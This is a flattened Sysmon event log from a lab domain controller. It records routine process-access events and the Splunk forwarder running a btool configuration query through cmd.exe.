10:40:11.416{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001806Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001805Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001804Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001803Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001802Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001801Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E0B-5F80-4800-000000007F01}2532C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001800Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3E0B-5F80-4700-000000007F01}22002664C:\Windows\system32\cmd.exe{733EE690-3E0B-5F80-4800-000000007F01}2532C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001799Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.428{733EE690-3E0B-5F80-4800-000000007F01}2532C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{733EE690-3E0B-5F80-4700-000000007F01}2200C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000001798Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0B-5F80-4700-000000007F01}2200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001797Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001796Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001795Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001794Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001793Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001792Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001791Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001790Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001789Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001788Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E0B-5F80-4700-000000007F01}2200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001787Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.416{733EE690-3E0A-5F80-3F00-000000007F01}39443948C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{733EE690-3E0B-5F80-4700-000000007F01}2200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001786Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.423{733EE690-3E0B-5F80-4700-000000007F01}2200C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E0A-5F80-3F00-000000007F01}3944C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001785Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.385{733EE690-3E0B-5F80-4500-000000007F01}40564060C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001784Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.369{733EE690-3E0B-5F80-4600-000000007F01}40762472C:\Windows\system32\wbem\wmiprvse.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\System32\combase.dll+50a3b|C:\Windows\System32\combase.dll+a78d2|C:\Windows\System32\combase.dll+a81fe|C:\Windows\System32\combase.dll+a7fbf|C:\Windows\System32\combase.dll+46818|C:\Windows\System32\combase.dll+46430|C:\Windows\System32\combase.dll+54167|C:\Windows\System32\combase.dll+c1a64|C:\Windows\System32\combase.dll+521e1|C:\Windows\System32\combase.dll+52730|C:\Windows\System32\combase.dll+1fca|C:\Windows\System32\RPCRT4.dll+dbd2a|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b93|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd 10341000x80000000000000001783Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.166{733EE690-3DF9-5F80-1000-000000007F01}11322352C:\Windows\system32\svchost.exe{733EE690-3E0B-5F80-4600-000000007F01}4076C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wmiprvsd.dll+fa1f|C:\Windows\system32\wbem\wmiprvsd.dll+1351d|C:\Windows\system32\wbem\wmiprvsd.dll+127f4|C:\Windows\system32\wbem\wbemcore.dll+ced2|C:\Windows\system32\wbem\wbemcore.dll+d531|C:\Windows\system32\wbem\wbemcore.dll+104fe|C:\Windows\system32\wbem\wbemcore.dll+25435|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c 10341000x80000000000000001782Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.166{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E0B-5F80-4600-000000007F01}4076C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001781Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.152{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E0B-5F80-4600-000000007F01}4076C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001780Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 